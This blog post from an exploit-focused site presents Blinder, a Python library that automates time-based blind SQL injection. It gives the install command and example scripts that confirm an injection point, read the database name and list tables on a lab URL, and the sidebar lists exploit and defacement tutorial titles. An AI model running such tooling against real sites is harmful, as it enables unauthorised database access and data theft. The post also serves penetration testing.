• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Blinder – A Python Library To Automate Time-Based Blind SQL Injection

February 2, 2020 by Jack Wilder Leave a Comment

Blinder – A Python Library To Automate Time-Based Blind SQL Injection.

Blinder

Blidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.

Installation

You can install Blinder using the following command:

pip install blinder

Or by downloading the source and importing it manually to your project.

Usage

To use blinder you need to import Blinder module then start using the main functions of Blinder.

You can use Blinder “with the current version” to do the following:

  • Check for time based injection.
  • Get database name.
  • Get tables names.

You can check for injection in a URL using the following code:

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

The execution result will be:

[email protected]:~/Desktop# python check.py
True
[email protected]:~/Desktop#

You can Get database name using the following code:

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)

print "Database name is : %s " % blind.get_database()

And the results will be:

[email protected]:~/Desktop# python get-database.py
Database name is : db1
[email protected]:~/Desktop#

To get tables names you can use the following code:

#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

And the results will be:

[email protected]:~/Desktop# python get-tables.py
blogs
notes
[email protected]:~/Desktop#

TODO

A lot of features should be added soon like:

  • the ability of adding customized query
  • test injection points based on burp request
  • extract tables/columns data

GitHub

  • https://github.com/mhaskar/Blinder
Shares

Filed Under: SQL Injection, Tools

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Mendapatkan RDP Gratis Dengan Shell Windows

Prestashop Module Blocktestimonial File Upload Auto Exploit

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

FCKeditor Bypass Shell Upload With Burp Suite Intercept

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Exploit WPStore Themes Upload Vulnerability

Open Redirect Bypass Cheat Sheet

Shopify Custom Domain or Subdomain Takeover

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Powered by WordPress and Genesis Framework. Style by LinuxSec.